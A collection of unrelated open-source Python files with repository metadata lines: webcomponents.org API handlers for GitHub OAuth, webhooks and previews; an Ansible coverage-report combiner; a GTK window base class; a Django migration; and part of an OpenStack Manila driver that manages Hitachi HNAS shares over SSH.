page = Content.get_by_id('page-' + path, parent=version_key, read_policy=ndb.EVENTUAL_CONSISTENCY)
if page is None:
self.response.set_status(404)
self.response.write('Cannot find page %s' % path)
return
self.response.write(page.content)
class GetAuthor(webapp2.RequestHandler):
@ndb.toplevel
def get(self, author):
self.response.headers['Access-Control-Allow-Origin'] = '*'
author_object = Author.get_by_id(author.lower())
if author_object is None or author_object.status != Status.ready:
self.response.set_status(404)
return
metadata = json.loads(author_object.metadata)
result = {
'type': metadata['type'],
'login': metadata['login'],
'name': metadata['name'],
'company': metadata['company'],
'blog': metadata['blog'],
'location': metadata['location'],
'email': metadata['email'],
'bio': metadata['bio'],
'avatar_url': metadata['avatar_url'],
'followers': metadata['followers'],
'following': metadata['following'],
'public_gists': metadata['public_gists'],
'public_repos': metadata['public_repos'],
}
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(result))
def exchange_token(handler):
code = handler.request.get('code')
# Exchange code for an access token from Github
headers = {'Accept': 'application/json'}
access_token_url = 'https://github.com/login/oauth/access_token'
params = {
'client_id': util.SECRETS['github_client_id'],
'client_secret': util.SECRETS['github_client_secret'],
'code': code
}
access_response = urlfetch.fetch(access_token_url, payload=urllib.urlencode(params), headers=headers, method='POST', validate_certificate=True)
access_token_response = json.loads(access_response.content)
if access_response.status_code != 200 or not access_token_response or access_token_response.get('error'):
handler.response.set_status(401)
handler.response.write('Authorization failed')
return None
return access_token_response['access_token']
class StarRepo(webapp2.RequestHandler):
def post(self, owner, repo):
self.response.headers['Access-Control-Allow-Origin'] = '*'
access_token = exchange_token(self)
if access_token is None:
return
starred = util.github_request('user/starred', owner, repo, access_token=access_token, method='GET')
# Check if repository is already starred
if starred.status_code is 204:
self.response.set_status(202)
return
util.github_request('user/starred', owner, repo, access_token=access_token, method='PUT')
self.response.set_status(204)
class RegisterPreview(webapp2.RequestHandler):
def post(self):
full_name = self.request.get('repo').lower()
split = full_name.split('/')
if len(split) != 2:
self.response.set_status(400)
self.response.write('Bad request, not repo')
return
owner = split[0]
repo = split[1]
access_token = exchange_token(self)
if access_token is None:
return
# Validate access token against repo
repos_response = util.github_get('repos/%s' % full_name, access_token=access_token)
if repos_response.status_code != 200:
self.response.set_status(401)
self.response.write('Cannot access repo')
return
info = json.loads(repos_response.content)
has_access = info['permissions']['admin']
if not has_access:
self.response.set_status(401)
self.response.write('Do not have access to the repo')
return
parsed_url = urlparse(self.request.url)
params = {'name': 'web', 'events': ['pull_request']}
params['config'] = {
'url': '%s://%s/api/preview-event' % (parsed_url.scheme, parsed_url.netloc),
'content_type': 'json',
}
# Check if the webhook exists
list_webhooks_response = util.github_post('repos', owner, repo, 'hooks', access_token=access_token)
if list_webhooks_response.status_code != 200:
logging.error('Unable to query existing webhooks, continuing anyway. Github %s: %s',
list_webhooks_response.status_code, list_webhooks_response.content)
else:
webhooks = json.loads(list_webhooks_response.content)
for webhook in webhooks:
if webhook['active'] and webhook['config'] == params['config']:
self.response.write('Webhook is already configured')
return
# Create the webhook
create_webhook_response = util.github_post('repos', owner, repo, 'hooks', params, access_token)
if create_webhook_response.status_code != 201:
self.response.set_status(500)
self.response.write('Failed to create webhook.')
logging.error('Failed to create webhook. Github %s: %s',
create_webhook_response.status_code, create_webhook_response.content)
return
# Trigger shallow ingestion of the library so we can store the access token.
util.new_task(util.ingest_webhook_task(owner, repo), params={'access_token': access_token}, target='manage')
self.response.write('Created webhook')
class PreviewEvent(webapp2.RequestHandler):
def post(self):
if self.request.headers.get('X-Github-Event') != 'pull_request':
self.response.set_status(202) # Accepted
self.response.write('Payload was not for a pull_request, aborting.')
return
payload = json.loads(self.request.body)
if payload['action'] != 'opened' and payload['action'] != 'synchronize':
self.response.set_status(202) # Accepted
self.response.write('Payload was not opened or synchronize, aborting.')
return
# Original repo
origin_owner = payload['repository']['owner']['login']
origin_repo = payload['repository']['name']
origin_full_name = payload['repository']['full_name']
# Repo where the pull request came from.
pull_owner = payload['pull_request']['head']['repo']['owner']['login']
pull_repo = payload['pull_request']['head']['repo']['name']
key = ndb.Key(Library, Library.id(origin_owner, origin_repo))
library = key.get(read_policy=ndb.EVENTUAL_CONSISTENCY)
if library is None:
logging.error('No library object found for %s', origin_full_name)
self.response.set_status(400) # Bad request
self.response.write('It does not seem like this repository was registered')
return
sha = payload['pull_request']['head']['sha']
parsed_url = urlparse(self.request.url)
params = {
'state': 'success',
'target_url': '%s://%s/preview/%s/%s/%s' % (parsed_url.scheme, parsed_url.netloc, pull_owner, pull_repo, sha),
'description': 'Preview is ready!', # TODO: Don't lie
'context': 'webcomponents/preview'
}
response = util.github_post('repos', origin_owner, origin_repo, 'statuses/%s' % sha, params, library.github_access_token)
if response.status_code != 201:
logging.error('Failed to set status on Github PR. Github returned %s:%s', response.status_code, response.content)
self.response.set_status(500)
self.response.write('Failed to set status on PR.')
return
pull_request_url = payload['pull_request']['url']
util.new_task(util.ingest_preview_task(pull_owner, pull_repo), params={'commit': sha, 'url': pull_request_url}, target='manage')
def validate_captcha(handler):
recaptcha = handler.request.get('recaptcha')
params = {
'secret': util.SECRETS['recaptcha'],
'response': recaptcha,
'remoteip': handler.request.remote_addr,
}
response = urlfetch.fetch('https://www.google.com/recaptcha/api/siteverify', payload=urllib.urlencode(params), method='POST', validate_certificate=True)
if not json.loads(response.content).get('success', False):
handler.response.set_status(403)
return False
return True
class PreviewCommit(webapp2.RequestHandler):
def post(self):
if not validate_captcha(self):
return
url = self.request.get('url')
match = re.match(r'https://github.com/(.*?)/([^/]*)(.*)', url)
if match is None:
self.response.set_status(400)
self.response.write('Unable to understand url (%s)' % url)
owner = match.group(1)
repo = match.group(2)
tail = match.group(3)
# SHA already defined
match = re.match(r'.*commits?/(.*)', tail)
if match:
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
self.response.write('%s/%s/%s' % (owner, repo, match.group(1)))
util.new_task(util.ingest_preview_task(owner, repo), params={'commit': match.group(1), 'url': url}, target='manage')
return
# Resolve SHA using these patterns and Github API
tail = re.sub(r'/pull/(.*)', r'pull/\1/head', tail)
tail = re.sub(r'/tree/(.*)', r'heads/\1', tail)
tail = re.sub(r'^$', r'heads/master', tail)
if not tail:
self.response.set_status(400)
self.response.write('Unable to understand url (%s)' % url)
return
response = util.github_get('repos', owner, repo, 'git/refs/' + tail)
if response.status_code == 404:
self.response.set_status(400)
self.response.write('Error resolving url (%s)' % url)
return
refs = json.loads(response.content)
if 'object' not in refs or 'sha' not in refs['object']:
self.response.set_status(400)
self.response.write('Error determining SHA from url (%s)' % url)
return
sha = json.loads(response.content)['object']['sha']
util.new_task(util.ingest_preview_task(owner, repo), params={'commit': sha, 'url': url}, target='manage')
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
self.response.write('%s/%s/%s' % (owner, repo, sha))
class PublishLibrary(webapp2.RequestHandler):
def post(self, library):
if not validate_captcha(self):
return
split = library.split('/')
if len(split) is 2:
scope = split[0]
package = split[1]
elif len(split) is 1:
scope = '@@npm'
package = library
else:
self.response.set_status(400)
self.response.write('Invalid name')
return
# TODO: validate valid repo and return result
task_url = util.ingest_library_task(scope, package)
util.new_task(task_url, target='manage')
class GetSitemap(webapp2.RequestHandler):
def get(self, kind):
if kind not in ['elements', 'collections', 'authors']:
self.response.set_status(404)
return
sitemap = Sitemap.get_by_id(kind)
if sitemap is None:
self.response.set_status(404)
return
prefix = {
'elements': '/element/',
'collections': '/collection/',
'authors': '/author/',
}[kind]
parsed_url = urlparse(self.request.url)
host = '%s://%s' % (parsed_url.scheme, parsed_url.netloc)
self.response.headers['Content-Type'] = 'text/plain'
self.response.write('\n'.join(['%s%s%s' % (host, prefix, page) for page in sitemap.pages]))
# pylint: disable=invalid-name
app = webapp2.WSGIApplication([
webapp2.Route(r'/api/publish/<library:([^\/]+|@?[^\/]+\/[^\/]+)>', handler=PublishLibrary),
webapp2.Route(r'/api/preview', handler=RegisterPreview),
webapp2.Route(r'/api/preview-event', handler=PreviewEvent),
webapp2.Route(r'/api/preview-commit', handler=PreviewCommit),
webapp2.Route(r'/api/meta/<author>', handler=GetAuthor),
webapp2.Route(r'/api/meta/<owner>/<repo>', handler=GetMetadata),
webapp2.Route(r'/api/meta/<owner>/<repo>/<ver>', handler=GetMetadata),
webapp2.Route(r'/api/docs/<owner>/<repo>', handler=GetDocs),
webapp2.Route(r'/api/docs/<owner>/<repo>/<ver>', handler=GetDocs),
webapp2.Route(r'/api/page/<owner>/<repo>/<ver>/<path:.*>', handler=GetPage),
webapp2.Route(r'/api/dependencies/<owner>/<repo>', handler=GetDependencies),
webapp2.Route(r'/api/dependencies/<owner>/<repo>/<version>', handler=GetDependencies),
webapp2.Route(r'/api/collections/<owner>/<repo>', handler=GetCollections),
webapp2.Route(r'/api/collections/<owner>/<repo>/<version>', handler=GetCollections),
webapp2.Route(r'/api/search/<terms>', handler=SearchContents),
webapp2.Route(r'/api/sitemap/<kind>.txt', handler=GetSitemap),
webapp2.Route(r'/api/star/<owner>/<repo>', handler=StarRepo),
], debug=True)
|
webcomponents/webcomponents.org
|
src/api.py
|
Python
|
apache-2.0
| 26,875
|
"""Combine integration test target code coverage reports."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from .... import types as t
from . import (
CoverageAnalyzeTargetsConfig,
get_target_index,
make_report,
read_report,
write_report,
)
if t.TYPE_CHECKING:
from . import (
Arcs,
Lines,
TargetIndexes,
)
def command_coverage_analyze_targets_combine(args): # type: (CoverageAnalyzeTargetsCombineConfig) -> None
"""Combine integration test target code coverage reports."""
combined_target_indexes = {} # type: TargetIndexes
combined_path_arcs = {} # type: Arcs
combined_path_lines = {} # type: Lines
for report_path in args.input_files:
covered_targets, covered_path_arcs, covered_path_lines = read_report(report_path)
merge_indexes(covered_path_arcs, covered_targets, combined_path_arcs, combined_target_indexes)
merge_indexes(covered_path_lines, covered_targets, combined_path_lines, combined_target_indexes)
report = make_report(combined_target_indexes, combined_path_arcs, combined_path_lines)
write_report(args, report, args.output_file)
def merge_indexes(
source_data, # type: t.Dict[str, t.Dict[t.Any, t.Set[int]]]
source_index, # type: t.List[str]
combined_data, # type: t.Dict[str, t.Dict[t.Any, t.Set[int]]]
combined_index, # type: TargetIndexes
): # type: (...) -> None
"""Merge indexes from the source into the combined data set (arcs or lines)."""
for covered_path, covered_points in source_data.items():
combined_points = combined_data.setdefault(covered_path, {})
for covered_point, covered_target_indexes in covered_points.items():
combined_point = combined_points.setdefault(covered_point, set())
for covered_target_index in covered_target_indexes:
combined_point.add(get_target_index(source_index[covered_target_index], combined_index))
class CoverageAnalyzeTargetsCombineConfig(CoverageAnalyzeTargetsConfig):
"""Configuration for the `coverage analyze targets combine` command."""
def __init__(self, args): # type: (t.Any) -> None
super(CoverageAnalyzeTargetsCombineConfig, self).__init__(args)
self.input_files = args.input_file # type: t.List[str]
self.output_file = args.output_file # type: str
|
roadmapper/ansible
|
test/lib/ansible_test/_internal/coverage/analyze/targets/combine.py
|
Python
|
gpl-3.0
| 2,420
|
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <ahernandez@emergya.com>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <devmaster@guadalinex.org>"
__license__ = "GPL-2"
from gi.repository import Gtk
from gi.repository import GObject
from . helpers import get_builder, show_uri, get_help_uri
# This class is meant to be subclassed by FirstbootWindow. It provides
# common functions and some boilerplate.
class Window(Gtk.Window):
__gtype_name__ = "Window"
# To construct a new instance of this method, the following notable
# methods are called in this order:
# __new__(cls)
# __init__(self)
# finish_initializing(self, builder)
# __init__(self)
#
# For this reason, it's recommended you leave __init__ empty and put
# your initialization code in finish_initializing
def __init__(self):
GObject.GObject.__init__(self)
def __new__(cls):
"""Special static method that's automatically called by Python when
constructing a new instance of this class.
Returns a fully instantiated BaseFirstbootWindow object.
"""
builder = get_builder(cls.__gtype_name__)
new_object = builder.get_object(cls.__gtype_name__)
new_object._finish_initializing(builder)
return new_object
def _finish_initializing(self, builder):
"""Called while initializing this instance in __new__
finish_initializing should be called after parsing the UI definition
and creating a FirstbootWindow object with it in order to finish
initializing the start of the new FirstbootWindow instance.
"""
# Get a reference to the builder and set up the signals.
self.builder = builder
self.ui = builder.get_ui(self, True)
self.connect("delete_event", self.on_delete_event)
self.translate()
self.finish_initializing(builder)
def finish_initializing(self, builder):
pass
def on_destroy(self, widget, data=None):
"""Called when the FirstbootWindow is closed."""
# Clean up code for saving application state should be added here.
Gtk.main_quit()
def on_delete_event(self, widget, data=None):
return False
def translate():
pass
|
gecos-team/gecosws-agent
|
gecosfirstlogin_lib/Window.py
|
Python
|
gpl-2.0
| 3,073
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-26 21:26
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('todo', '0008_auto_20160126_0004'),
]
operations = [
migrations.AddField(
model_name='todolist',
name='list_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='item',
name='creation_date',
field=models.DateTimeField(default=datetime.datetime(2016, 1, 26, 14, 26, 31, 705576), verbose_name='date created'),
),
migrations.AlterField(
model_name='todolist',
name='creation_date',
field=models.DateTimeField(default=datetime.datetime(2016, 1, 26, 14, 26, 31, 704075), verbose_name='date created'),
),
]
|
akmcinto/TodoApp
|
ToDoApp/todo/migrations/0009_auto_20160126_1426.py
|
Python
|
apache-2.0
| 1,146
|
# Copyright (c) 2015 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_concurrency import processutils
from oslo_log import log
from oslo_utils import strutils
from oslo_utils import units
import paramiko
import six
import os
import time
from manila import exception
from manila.i18n import _
from manila import utils as mutils
LOG = log.getLogger(__name__)
class HNASSSHBackend(object):
def __init__(self, hnas_ip, hnas_username, hnas_password, ssh_private_key,
cluster_admin_ip0, evs_id, evs_ip, fs_name, job_timeout):
self.ip = hnas_ip
self.port = 22
self.user = hnas_username
self.password = hnas_password
self.priv_key = ssh_private_key
self.admin_ip0 = cluster_admin_ip0
self.evs_id = six.text_type(evs_id)
self.fs_name = fs_name
self.evs_ip = evs_ip
self.sshpool = None
self.job_timeout = job_timeout
LOG.debug("Hitachi HNAS Driver using SSH backend.")
def get_stats(self):
"""Get the stats from file-system.
:returns:
fs_capacity.size = Total size from filesystem.
available_space = Free space currently on filesystem.
dedupe = True if dedupe is enabled on filesystem.
"""
command = ['df', '-a', '-f', self.fs_name]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not get HNAS backend stats.")
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
line = output.split('\n')
fs = Filesystem(line[3])
available_space = fs.size - fs.used
return fs.size, available_space, fs.dedupe
def nfs_export_add(self, share_id, snapshot_id=None):
if snapshot_id is not None:
path = os.path.join('/snapshots', share_id, snapshot_id)
name = os.path.join('/snapshots', snapshot_id)
else:
path = name = os.path.join('/shares', share_id)
command = ['nfs-export', 'add', '-S', 'disable', '-c', '127.0.0.1',
name, self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not create NFS export %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def nfs_export_del(self, share_id=None, snapshot_id=None):
if share_id is not None:
name = os.path.join('/shares', share_id)
elif snapshot_id is not None:
name = os.path.join('/snapshots', snapshot_id)
else:
msg = _("NFS export not specified to delete.")
raise exception.HNASBackendException(msg=msg)
command = ['nfs-export', 'del', name]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'does not exist' in e.stderr:
LOG.warning("Export %s does not exist on "
"backend anymore.", name)
else:
msg = _("Could not delete NFS export %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def cifs_share_add(self, share_id, snapshot_id=None):
if snapshot_id is not None:
path = r'\\snapshots\\' + share_id + r'\\' + snapshot_id
name = snapshot_id
else:
path = r'\\shares\\' + share_id
name = share_id
command = ['cifs-share', 'add', '-S', 'disable', '--enable-abe',
'--nodefaultsaa', name, self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not create CIFS share %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def cifs_share_del(self, name):
command = ['cifs-share', 'del', '--target-label', self.fs_name,
name]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if e.exit_code == 1:
LOG.warning("CIFS share %s does not exist on "
"backend anymore.", name)
else:
msg = _("Could not delete CIFS share %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def get_nfs_host_list(self, share_id):
export = self._get_export(share_id)
return export[0].export_configuration
def update_nfs_access_rule(self, host_list, share_id=None,
snapshot_id=None):
if share_id is not None:
name = os.path.join('/shares', share_id)
elif snapshot_id is not None:
name = os.path.join('/snapshots', snapshot_id)
else:
msg = _("No share/snapshot provided to update NFS rules.")
raise exception.HNASBackendException(msg=msg)
command = ['nfs-export', 'mod', '-c']
if len(host_list) == 0:
command.append('127.0.0.1')
else:
string_command = '"' + six.text_type(host_list[0])
for i in range(1, len(host_list)):
string_command += ',' + (six.text_type(host_list[i]))
string_command += '"'
command.append(string_command)
command.append(name)
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not update access rules for NFS export %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def cifs_allow_access(self, name, user, permission, is_snapshot=False):
command = ['cifs-saa', 'add', '--target-label', self.fs_name,
name, user, permission]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'already listed as a user' in e.stderr:
if is_snapshot:
LOG.debug('User %(user)s already allowed to access '
'snapshot %(snapshot)s.', {
'user': user,
'snapshot': name,
})
else:
self._update_cifs_rule(name, user, permission)
else:
entity_type = "share"
if is_snapshot:
entity_type = "snapshot"
msg = _("Could not add access of user %(user)s to "
"%(entity_type)s %(name)s.") % {
'user': user,
'name': name,
'entity_type': entity_type,
}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def _update_cifs_rule(self, name, user, permission):
LOG.debug('User %(user)s already allowed to access '
'share %(share)s. Updating access level...', {
'user': user,
'share': name,
})
command = ['cifs-saa', 'change', '--target-label', self.fs_name,
name, user, permission]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not update access of user %(user)s to "
"share %(share)s.") % {
'user': user,
'share': name,
}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def cifs_deny_access(self, name, user, is_snapshot=False):
command = ['cifs-saa', 'delete', '--target-label', self.fs_name,
name, user]
entity_type = "share"
if is_snapshot:
entity_type = "snapshot"
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if ('not listed as a user' in e.stderr or
'Could not delete user/group' in e.stderr):
LOG.warning('User %(user)s already not allowed to access '
'%(entity_type)s %(name)s.', {
'entity_type': entity_type,
'user': user,
'name': name
})
else:
msg = _("Could not delete access of user %(user)s to "
"%(entity_type)s %(name)s.") % {
'user': user,
'name': name,
'entity_type': entity_type,
}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def list_cifs_permissions(self, hnas_share_id):
command = ['cifs-saa', 'list', '--target-label', self.fs_name,
hnas_share_id]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if 'No entries for this share' in e.stderr:
LOG.debug('Share %(share)s does not have any permission '
'added.', {'share': hnas_share_id})
return []
else:
msg = _("Could not list access of share %s.") % hnas_share_id
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
permissions = CIFSPermissions(output)
return permissions.permission_list
def tree_clone(self, src_path, dest_path):
command = ['tree-clone-job-submit', '-e', '-f', self.fs_name,
src_path, dest_path]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if ('Cannot find any clonable files in the source directory' in
e.stderr):
msg = _("Source path %s is empty.") % src_path
LOG.debug(msg)
raise exception.HNASNothingToCloneException(msg=msg)
else:
msg = _("Could not submit tree clone job to clone from %(src)s"
" to %(dest)s.") % {'src': src_path, 'dest': dest_path}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
job_submit = JobSubmit(output)
if job_submit.request_status == 'Request submitted successfully':
job_id = job_submit.job_id
job_status = None
progress = ''
job_rechecks = 0
starttime = time.time()
deadline = starttime + self.job_timeout
while (not job_status or
job_status.job_state != "Job was completed"):
command = ['tree-clone-job-status', job_id]
output, err = self._execute(command)
job_status = JobStatus(output)
if job_status.job_state == 'Job failed':
break
old_progress = progress
progress = job_status.data_bytes_processed
if old_progress == progress:
job_rechecks += 1
now = time.time()
if now > deadline:
command = ['tree-clone-job-abort', job_id]
self._execute(command)
LOG.error("Timeout in snapshot creation from "
"source path %s.", src_path)
msg = _("Share snapshot of source path %s "
"was not created.") % src_path
raise exception.HNASBackendException(msg=msg)
else:
time.sleep(job_rechecks ** 2)
else:
job_rechecks = 0
if (job_status.job_state, job_status.job_status,
job_status.directories_missing,
job_status.files_missing) == ("Job was completed",
"Success", '0', '0'):
LOG.debug("Snapshot of source path %(src)s to destination "
"path %(dest)s created successfully.",
{'src': src_path,
'dest': dest_path})
else:
LOG.error('Error creating snapshot of source path %s.',
src_path)
msg = _('Snapshot of source path %s was not '
'created.') % src_path
raise exception.HNASBackendException(msg=msg)
def tree_delete(self, path):
command = ['tree-delete-job-submit', '--confirm', '-f', self.fs_name,
path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'Source path: Cannot access' in e.stderr:
LOG.warning("Attempted to delete path %s "
"but it does not exist.", path)
else:
msg = _("Could not submit tree delete job to delete path "
"%s.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
@mutils.retry(exception=exception.HNASSSCContextChange, wait_random=True,
retries=5)
def create_directory(self, dest_path):
self._locked_selectfs('create', dest_path)
if not self.check_directory(dest_path):
msg = _("Command to create directory %(path)s was run in another "
"filesystem instead of %(fs)s.") % {
'path': dest_path,
'fs': self.fs_name,
}
LOG.warning(msg)
raise exception.HNASSSCContextChange(msg=msg)
@mutils.retry(exception=exception.HNASSSCContextChange, wait_random=True,
retries=5)
def delete_directory(self, path):
try:
self._locked_selectfs('delete', path)
except exception.HNASDirectoryNotEmpty:
pass
else:
if self.check_directory(path):
msg = _("Command to delete empty directory %(path)s was run in"
" another filesystem instead of %(fs)s.") % {
'path': path,
'fs': self.fs_name,
}
LOG.debug(msg)
raise exception.HNASSSCContextChange(msg=msg)
@mutils.retry(exception=exception.HNASSSCIsBusy, wait_random=True,
retries=5)
def check_directory(self, path):
command = ['path-to-object-number', '-f', self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'path-to-object-number is currently running' in e.stdout:
msg = (_("SSC command path-to-object-number for path %s "
"is currently busy.") % path)
raise exception.HNASSSCIsBusy(msg=msg)
if 'Unable to locate component:' in e.stdout:
LOG.debug("Cannot find %(path)s: %(out)s",
{'path': path, 'out': e.stdout})
return False
else:
msg = _("Could not check if path %s exists.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
return True
def check_fs_mounted(self):
command = ['df', '-a', '-f', self.fs_name]
output, err = self._execute(command)
if "not found" in output:
msg = _("Filesystem %s does not exist or it is not available "
"in the current EVS context.") % self.fs_name
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
line = output.split('\n')
fs = Filesystem(line[3])
return fs.mounted
def mount(self):
command = ['mount', self.fs_name]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'file system is already mounted' not in e.stderr:
msg = _("Failed to mount filesystem %s.") % self.fs_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def vvol_create(self, vvol_name):
# create a virtual-volume inside directory
path = '/shares/' + vvol_name
command = ['virtual-volume', 'add', '--ensure', self.fs_name,
vvol_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Failed to create vvol %s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def vvol_delete(self, vvol_name):
path = '/shares/' + vvol_name
# Virtual-volume and quota are deleted together
command = ['tree-delete-job-submit', '--confirm', '-f',
self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'Source path: Cannot access' in e.stderr:
LOG.warning("Share %s does not exist.", vvol_name)
else:
msg = _("Failed to delete vvol %s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def quota_add(self, vvol_name, vvol_quota):
str_quota = six.text_type(vvol_quota) + 'G'
command = ['quota', 'add', '--usage-limit',
str_quota, '--usage-hard-limit',
'yes', self.fs_name, vvol_name]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Failed to add %(quota)s quota to vvol "
"%(vvol)s.") % {'quota': str_quota, 'vvol': vvol_name}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def modify_quota(self, vvol_name, new_size):
str_quota = six.text_type(new_size) + 'G'
command = ['quota', 'mod', '--usage-limit', str_quota,
self.fs_name, vvol_name]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Failed to update quota of vvol %(vvol)s to "
"%(quota)s.") % {'quota': str_quota, 'vvol': vvol_name}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def check_vvol(self, vvol_name):
command = ['virtual-volume', 'list', '--verbose', self.fs_name,
vvol_name]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Virtual volume %s does not exist.") % vvol_name
LOG.exception(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def check_quota(self, vvol_name):
command = ['quota', 'list', '--verbose', self.fs_name, vvol_name]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not check quota of vvol %s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
if 'No quotas matching specified filter criteria' in output:
msg = _("Virtual volume %s does not have any"
" quota.") % vvol_name
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def check_export(self, vvol_name, is_snapshot=False):
export = self._get_export(vvol_name, is_snapshot=is_snapshot)
if (vvol_name in export[0].export_name and
self.fs_name in export[0].file_system_label):
return
else:
msg = _("Export %s does not exist.") % export[0].export_name
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def check_cifs(self, vvol_name):
output = self._cifs_list(vvol_name)
cifs_share = CIFSShare(output)
if self.fs_name != cifs_share.fs:
msg = _("CIFS share %(share)s is not located in "
"configured filesystem "
"%(fs)s.") % {'share': vvol_name,
'fs': self.fs_name}
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def is_cifs_in_use(self, vvol_name):
output = self._cifs_list(vvol_name)
cifs_share = CIFSShare(output)
return cifs_share.is_mounted
def _cifs_list(self, vvol_name):
command = ['cifs-share', 'list', vvol_name]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if 'does not exist' in e.stderr:
msg = _("CIFS share %(share)s was not found in EVS "
"%(evs_id)s") % {'share': vvol_name,
'evs_id': self.evs_id}
LOG.exception(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
msg = _("Could not list CIFS shares by vvol name "
"%s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
return output
def get_share_quota(self, share_id):
command = ['quota', 'list', self.fs_name, share_id]
output, err = self._execute(command)
quota = Quota(output)
if quota.limit is None:
return None
if quota.limit_unit == 'TB':
return quota.limit * units.Ki
elif quota.limit_unit == 'GB':
return quota.limit
else:
msg = _("Share %s does not support quota values "
"below 1G.") % share_id
LOG.error(msg)
raise exception.HNASBackendException(msg=msg)
def get_share_usage(self, share_id):
command = ['quota', 'list', self.fs_name, share_id]
output, err = self._execute(command)
quota = Quota(output)
if quota.usage is None:
msg = _("Virtual volume %s does not have any quota.") % share_id
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
bytes_usage = strutils.string_to_bytes(six.text_type(quota.usage) +
quota.usage_unit)
return bytes_usage / units.Gi
def _get_export(self, name, is_snapshot=False):
if is_snapshot:
name = '/snapshots/' + name
else:
name = '/shares/' + name
command = ['nfs-export', 'list ', name]
export_list = []
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if 'does not exist' in e.stderr:
msg = _("Export %(name)s was not found in EVS "
"%(evs_id)s.") % {
'name': name,
'evs_id': self.evs_id,
}
LOG.exception(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
msg = _("Could not list NFS exports by name %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
items = output.split('Export name')
if items[0][0] == '\n':
items.pop(0)
for i in range(0, len(items)):
export_list.append(Export(items[i]))
return export_list
